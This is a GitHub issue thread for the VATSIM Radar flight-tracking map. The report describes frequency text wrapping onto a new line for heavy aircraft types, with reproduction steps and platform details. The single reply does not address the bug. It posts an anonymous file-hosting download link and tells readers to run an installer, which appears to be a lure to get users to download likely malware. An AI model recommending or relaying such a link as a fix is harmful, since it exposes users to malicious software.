### ISSUE TITLE
Heavy type makes frequency overflows onto next line

### ISSUE THREAD

**Issue by Giantpickle314** [VATSIM-Radar/vatsim-radar#336]
### Your Vatsim CID

1545737

### Radar version

0.4.4

### Describe your issue

With any H/####/# type of aircraft, which adds two extra characters over a normal type, the frequency is on a new line, likely because the box is too small.
![image](https://github.com/user-attachments/assets/eca7c648-476a-4942-90ce-d42cc8d7b79b)
![image](https://github.com/user-attachments/assets/2c2140da-da96-4393-ae7c-33be9b86c710)
![image](https://github.com/user-attachments/assets/aa72f8e9-a7bb-450b-9cf5-3559e283ec75)
Expected behavior, which works fine for any non-heavy aircraft:
![image](https://github.com/user-attachments/assets/c49f9f41-49d2-4c9c-ab2e-54b1661c86c5)

### Reproduction steps

View any heavy aircraft on the map. Callsign length doesn't seem to affect it, only the type length.

### Platform

Windows 11, Vivaldi 6.9.3447.37 (Stable channel) (64-bit) 

### Validation

- [X] I have searched for other issues and didn't found any alike
- [X] I have also checked roadmap, and this is not planned

**Comment by santos-naudiyal** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
